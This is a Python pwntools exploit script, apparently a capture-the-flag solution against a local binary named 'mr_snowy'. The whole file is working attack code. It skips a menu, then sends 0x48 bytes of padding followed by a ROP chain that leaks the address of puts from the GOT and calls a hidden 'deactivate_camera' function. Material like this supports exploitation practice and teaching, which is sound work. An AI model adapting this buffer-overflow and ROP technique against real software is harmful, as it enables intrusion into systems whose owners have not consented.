#!/bin/env python

from pwn import *

context.arch = 'amd64'
offset = 0x48

elf = ELF('./mr_snowy')
p = elf.process()

# navigate to the affected read()
def do_read():
  while True:
     ll = p.read()
     if b'>' in ll:
       break

rop = ROP(elf)
rop.call(elf.symbols['puts'], [elf.got['puts']])
rop.call(elf.symbols['deactivate_camera'])

# assemble payload
payload = [
    b'\xAA'*offset,
	rop.chain()
]

# skip menu
do_read()
p.sendline(b'1')
do_read()

# send payload
p.sendline(b''.join(payload))

p.interactive()